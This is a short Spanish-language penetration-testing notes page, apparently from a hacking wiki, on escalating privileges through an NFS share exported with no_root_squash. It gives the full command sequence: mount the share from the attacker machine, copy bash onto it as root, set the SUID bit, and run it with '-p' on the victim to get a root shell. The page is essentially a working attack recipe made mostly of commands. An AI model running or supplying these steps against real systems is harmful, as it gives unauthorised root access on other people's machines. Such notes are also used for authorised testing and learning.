2049/TCP (NFS)
no_root_squash
Revisar el archivo /etc/exports
y verificar si existe un directorio configurado con no_root_squash
.
Montar el directorio encontrado en la máquina atacante.
sudo mkdir /mnt/nfs-temp
sudo mount -t nfs <IP-address>:<share> /mnt/nfs-temp/ -nolock
Copiar desde la máquina atacante como usuario root
el binario bash
al directorio encontrado.
sudo cp /bin/bash /mnt/nfs-temp/<share>
Asignar privilegios de SUID (Set User ID) al binario bash
copiado.
sudo chmod +s bash
Ejecutar desde la máquina victima el binario bash
.
cd <share>
./bash -p
Última actualización
¿Te fue útil?